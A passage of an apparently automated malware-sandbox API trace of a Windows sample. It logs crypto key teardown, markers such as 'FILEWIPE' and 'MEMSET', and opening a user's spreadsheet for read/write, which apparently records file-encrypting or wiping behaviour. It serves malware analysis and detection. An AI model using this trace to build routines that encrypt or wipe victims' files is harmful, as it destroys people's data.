HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.913] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.913] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.913] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.913] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.914] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.914] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.914] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.914] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.919] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.919] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.919] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.923] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.923] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.923] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.923] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.923] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.924] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.924] CryptDestroyKey (hKey=0x7c2280) returned 1 [0033.924] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.924] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.924] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.924] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.924] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.924] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.924] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.924] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.924] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.924] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.925] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.925] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.925] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.925] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.925] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.925] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.925] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.925] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.925] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.925] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.925] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.925] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.925] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.925] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.926] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0033.926] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.926] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.926] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0033.926] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.926] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.926] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.926] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.926] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.927] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.927] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0033.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.927] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c03bc60, ftCreationTime.dwHighDateTime=0x1d5bcc0, ftLastAccessTime.dwLowDateTime=0xe68a5ae0, ftLastAccessTime.dwHighDateTime=0x1d5c1a1, ftLastWriteTime.dwLowDateTime=0xe68a5ae0, ftLastWriteTime.dwHighDateTime=0x1d5c1a1, nFileSizeHigh=0x0, nFileSizeLow=0x15bf2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="GGg2Vkusl20.xlsx", cAlternateFileName="GGG2VK~1.XLS")) returned 0x7c2240 [0033.927] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.927] CharLowerBuffW (in: lpsz="byte[89074]", cchLength=0xb | out: lpsz="byte[89074]") returned 0xb [0033.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.927] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.927] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.927] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.928] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.928] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.928] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.929] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.929] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.930] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.930] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.930] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.930] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\ggg2vkusl20.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0033.930] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.930] HeapFree (in: 